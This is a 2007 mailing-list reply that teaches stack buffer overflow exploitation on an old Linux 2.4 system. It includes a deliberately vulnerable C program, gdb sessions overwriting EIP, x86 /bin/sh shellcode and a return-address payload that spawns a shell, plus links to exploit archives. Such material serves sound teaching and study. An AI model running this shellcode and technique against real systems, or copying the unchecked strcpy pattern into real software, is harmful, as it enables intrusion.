Re: Learning buffer overflow help



Hey Eric,

On Wed, 6 Jun 2007, erk_3@xxxxxxxxxxx wrote:

Hello everyone, I have studied alot on buffer overflows and I understand the theory behind it. Thing is, any example I follow says once you can overwrite the EIP you can control the flow of the program (in a nutshell).

[snip]

I guess you're missing something basic here... Take a look at the following example:

nobody@slack10:/tmp$ cat /etc/slackware-version
Slackware 10.2.0
nobody@slack10:/tmp$ uname -a
Linux slack10 2.4.31 #6 Sun Jun 5 19:04:47 PDT 2005 i686 unknown unknown GNU/Linux
nobody@slack10:/tmp$ cat > vuln.c
#include <stdio.h>
#include <string.h>

int main (int argc, char *argv[])
{
char name[4];
strcpy(name, argv[1]);
printf(name); /* there's a pretty format string bug here too;) */
}
nobody@slack10:/tmp$ make vuln
cc vuln.c -o vuln
nobody@slack10:/tmp$ gdb -q ./vuln
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r 1234AAAABBBB
Starting program: /tmp/vuln 1234AAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

So far, so good. Now, to overwrite the %eip with an arbitrary valid address, you should do something like that instead:

(gdb) r `printf "1234AAAA\xee\xee\xff\xbf"`
Starting program: /tmp/vuln `printf "1234AAAA\xee\xee\xff\xbf"`

Program received signal SIGILL, Illegal instruction.
0xbfffeeee in ?? ()

Finally, to actually exploit the overflow to run an arbitrary shellcode:

nobody@slack10:/tmp$ export SC=`printf "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"`
[...]
(gdb) x/s 0xbfffff73
0xbfffff73: "SC=1Ph//shh/bin\211PS\211\231\v\200"
(gdb) x/s 0xbfffff76
0xbfffff76: "1Ph//shh/bin\211PS\211\231\v\200"
(gdb) r `printf "1234AAAA\x76\xff\xff\xbf"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vuln `printf "1234AAAA\x76\xff\xff\xbf"`

Program received signal SIGTRAP, Trace/breakpoint trap.
0x400007b0 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.
sh-3.00$

This is what happens on a kinda old system based on Linux kernel 2.4, without additional protections. YMMV on newer platforms...

You may also want to check out some exploitation examples here:

http://www.0xdeadbeef.info/code/abo-exploits.tgz
http://www.0xdeadbeef.info/code/fs-exploits.tgz
http://www.0xdeadbeef.info/code/vulndev-exploits.tgz
http://www.0xdeadbeef.info/code/linux-x86-exploits.tgz
http://www.0xdeadbeef.info/code/solaris-sparc-exploits.tgz

Cheers,

--
Marco Ivaldi
Antifork Research, Inc. http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707



Relevant Pages